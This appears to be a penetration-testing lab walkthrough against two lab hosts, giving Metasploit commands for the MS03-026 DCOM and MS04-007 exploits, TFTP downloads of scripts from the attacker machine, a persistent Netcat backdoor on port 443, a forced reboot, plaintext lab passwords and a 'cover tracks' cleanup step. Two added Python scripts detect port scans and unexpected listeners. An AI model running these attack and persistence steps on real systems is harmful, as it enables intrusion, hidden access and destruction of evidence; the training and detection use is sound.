TEST-XP2 = 131.107.1.222
DEN-WEB2 = 131.107.1.254
Step 1: Information Gathering (Scanning)
Scan Target with Nmap:
nmap -A 131.107.1.254
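From the defender's side, an "nmap -A" sweep like the one above shows up in firewall or flow logs as one source touching many distinct ports on one host in a short window. The script below is an added example (not part of the original lab, and not from any tool the lab uses) that flags that pattern from a constructed connection log; the log format, window and threshold are assumptions for the example, and only the two lab addresses come from the post.

```python
"""Flag port-scan behaviour from a connection log.

Constructed sample input (not from the original post): one line per
connection attempt, "<epoch> <src_ip> <dst_ip> <dst_port> <proto> <action>".
Lab addresses come from the post: TEST-XP2 131.107.1.222, DEN-WEB2 131.107.1.254.
"""
from collections import defaultdict, deque

# Constructed log: a normal client touching 80/443, then TEST-XP2 probing
# twenty ports on DEN-WEB2 within three seconds, which is what an aggressive
# scan looks like from the firewall's side.
SAMPLE_LOG = (
    "1000 10.0.0.15 131.107.1.254 80 tcp allow\n"
    "1002 10.0.0.15 131.107.1.254 443 tcp allow\n"
    + "".join(
        f"{1010 + i // 8} 131.107.1.222 131.107.1.254 {port} tcp deny\n"
        for i, port in enumerate([21, 22, 23, 25, 53, 80, 110, 111, 135, 139,
                                  143, 443, 445, 993, 995, 1723, 3306, 3389,
                                  5900, 8080])
    )
)


def parse_line(line):
    """Split one log line into typed fields."""
    ts, src, dst, dport, proto, action = line.split()
    return int(ts), src, dst, int(dport), proto, action


def detect_port_scans(log_text, window_seconds=60, port_threshold=15):
    """Return {src_ip: peak distinct (dst, port) pairs in any sliding window}
    for every source that reached port_threshold distinct targets within
    window_seconds. Lines must be in time order."""
    windows = defaultdict(deque)  # src -> deque of (ts, (dst, port))
    peaks = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport, _proto, _action = parse_line(line)
        q = windows[src]
        q.append((ts, (dst, dport)))
        # Drop entries that fell out of the sliding window.
        while q and ts - q[0][0] > window_seconds:
            q.popleft()
        distinct = len({pair for _, pair in q})
        if distinct >= port_threshold:
            peaks[src] = max(peaks.get(src, 0), distinct)
    return peaks


if __name__ == "__main__":
    for src, count in detect_port_scans(SAMPLE_LOG).items():
        print(f"possible port scan from {src}: {count} distinct targets")
```

The deny/allow field is parsed but deliberately not used: a scanner that finds open ports produces "allow" lines too, so the signal is the spread of destination ports, not the verdict on each.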
Step 2: Vulnerability Identification
Use Google search to find vulnerabilities on 131.107.1.254, based on the result of Step 1.
Example: MS03-026 (the MS-RPC DCOM vulnerability), or scan with the Nessus vulnerability scanner.
Step 3: Gain Access/Exploitation
>> Metasploit 2.x
msf > use msrpc_dcom_ms03_026
msf > set PAYLOAD win32_bind
msf > set RHOST 131.107.1.254
msf > set LPORT 5555
msf > exploit
>> Metasploit 3.x
msf > use windows/dcerpc/ms03_026_dcom
msf > set PAYLOAD windows/shell/bind_tcp
msf > set RHOST 131.107.1.254
msf > set LPORT 5555
msf > exploit
Step 4: Maintain Access
Ensure that you have launched TFTPD32 (the TFTP server).
Upload all necessary scripts...
C:\WINDOWS\System32>tftp -i 131.107.1.222 GET start.cmd
C:\WINDOWS\System32>tftp -i 131.107.1.222 GET cleanup.cmd
Run the script...
C:\WINDOWS\System32>start.cmd
On the TEST-XP2 machine, do the following:
Connect via Remote Desktop ...
User: myadmin
Password: P@ssw0rd
Open a new command prompt.
Launch Netcat to connect to the open port 443 on the remote machine...
Z:\Tools\NC>nc -v 131.107.1.254 443
Open another new command prompt.
Force the Target machine to reboot ...
Option 1: PSShutdown
Z:\Tools\SysinternalsSuite>psshutdown -r -f -u myadmin -p P@ssw0rd \\131.107.1.254
Option 2: Metasploit module
msf > use msasn1_ms04_007_killbill
msf > set PAYLOAD win32_bind
msf > set RHOST 131.107.1.254
msf > exploit
After the reboot, log on to the DEN-WEB2 machine with:
User: administrator
Password: P@ssw0rd
Switch to TEST-XP2 machine.
You should see your Netcat session connect.
Now you can connect to the Target machine at any time.
If not, re-run the command:
Z:\Tools\NC>nc -v 131.107.1.254 443
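Step 4 ends with DEN-WEB2 accepting a Netcat connection on TCP 443 even after a reboot, which on a web server is a port that should belong to the web service, not to nc.exe. The check a defender would run is to pair the host's listening sockets with the process that owns each one and flag any owner that is not on the expected list. The script below is an added example (not part of the lab, and not the cleanup or start script the post refers to); the netstat and tasklist text is constructed to resemble Windows output on a host like DEN-WEB2, and the expected-owner table is an assumption for the example.

```python
"""Flag listening TCP ports owned by unexpected processes.

Constructed sample input (not from the original post), shaped like
`netstat -ano` and `tasklist` output on a Windows web server such as the
post's DEN-WEB2 (131.107.1.254). PIDs, the nc.exe listener and the
expected-owner table are all assumptions made for this example.
"""
import re

NETSTAT_SAMPLE = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       724
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       1488
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1012
  TCP    131.107.1.254:443      131.107.1.222:1077     ESTABLISHED     1488
"""

TASKLIST_SAMPLE = """\
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System                           4 Console                    0         236 K
svchost.exe                    724 Console                    0       4,120 K
svchost.exe                   1012 Console                    0       3,900 K
nc.exe                        1488 Console                    0       1,204 K
"""

# Which image is allowed to own which listening port on this host (assumption;
# a real baseline would come from the server's build documentation).
EXPECTED_OWNERS = {
    135: {"svchost.exe"},
    443: {"inetinfo.exe", "w3wp.exe"},
    445: {"System"},
    3389: {"svchost.exe"},
}


def parse_tasklist(text):
    """Map PID -> image name from tasklist-style output, skipping headers."""
    pids = {}
    for line in text.splitlines():
        m = re.match(r"^(\S.*?)\s+(\d+)\s+\S+\s+\d+\s+[\d,]+ K$", line)
        if m:
            pids[int(m.group(2))] = m.group(1).strip()
    return pids


def parse_listeners(text):
    """Yield (port, pid) for every TCP socket in LISTENING state."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[0] == "TCP" and parts[3] == "LISTENING":
            port = int(parts[1].rsplit(":", 1)[1])
            yield port, int(parts[4])


def unexpected_listeners(netstat_text, tasklist_text, expected=EXPECTED_OWNERS):
    """Return [(port, pid, image)] for listeners whose owning image is not
    in the expected set for that port (unknown ports count as unexpected)."""
    pid_to_image = parse_tasklist(tasklist_text)
    findings = []
    for port, pid in parse_listeners(netstat_text):
        image = pid_to_image.get(pid, "<unknown>")
        if image not in expected.get(port, set()):
            findings.append((port, pid, image))
    return findings


if __name__ == "__main__":
    for port, pid, image in unexpected_listeners(NETSTAT_SAMPLE, TASKLIST_SAMPLE):
        print(f"port {port} is owned by {image} (PID {pid}), not an expected owner")
```

Because the listener here starts again at boot, a one-off look at netstat is not enough; the same check has to be part of the routine baseline so that a post-reboot change in port ownership is noticed.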
Step 5: Cover Tracks/Housekeeping
Switch to the Netcat opened command prompt.
Run the housekeeping script...
C:\WINDOWS\System32>cleanup.cmd